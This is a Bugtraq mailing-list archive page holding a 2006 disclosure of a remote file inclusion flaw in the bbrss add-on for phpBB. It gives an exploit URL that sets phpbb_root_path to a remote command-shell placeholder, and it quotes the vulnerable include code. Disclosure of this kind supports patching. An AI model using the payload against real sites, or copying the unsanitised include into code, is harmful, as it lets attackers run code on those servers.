Bugtraq mailing list archives

bbrss PhpBB (phpbb_root_path) Remote File Inclusion

From: SpC-x () Bsdmail Org
Date: 14 Jun 2006 04:56:46 -0000

######################################################

# bbrss PhpBB (phpbb_root_path) Remote File Inclusion

######################################################

# Credit : SpC-x | The_BeKiR

# Site : http://wWw.SaVSaK.CoM

######################################################

# Greetz :

# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |

######################################################

Remote File Inclusion :

http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell

Bbrss.PHP :

define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php'); 

/SpC-x

Current thread:

bbrss PhpBB (phpbb_root_path) Remote File Inclusion SpC-x (Jun 14)